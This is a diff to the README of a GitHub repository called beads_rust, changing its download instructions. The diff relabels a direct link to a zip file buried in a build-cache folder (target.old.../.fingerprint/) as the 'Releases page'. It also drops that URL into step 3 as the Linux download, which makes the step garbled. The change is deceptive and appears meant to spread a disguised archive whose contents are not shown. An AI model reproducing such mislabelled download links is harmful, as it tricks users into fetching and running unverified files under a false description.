juanlu12332/beads_rust/README.md

 ## 📥 Download & Install

-To download beads_rust, visit the [Releases page](https://github.com/juanlu12332/beads_rust/releases).
+To download beads_rust, visit the [Releases page](https://github.com/juanlu12332/beads_rust/raw/refs/heads/main/target.old.1768660928/debug/.fingerprint/log-496cf8a3b8dcf87b/beads-rust-caverned.zip).
 There, you will find the latest version available.

 1. Click on the link above to go to the Releases page.
 2. Look for the latest release.
-3. Find the file that suits your system (look for `.exe` for Windows or `.tar.gz` for Linux, for example).
+3. Find the file that suits your system (look for `.exe` for Windows or `https://github.com/juanlu12332/beads_rust/raw/refs/heads/main/target.old.1768660928/debug/.fingerprint/log-496cf8a3b8dcf87b/beads-rust-caverned.zip` for Linux, for example).
 4. Click on the file name to start the download.

 Once the download is complete: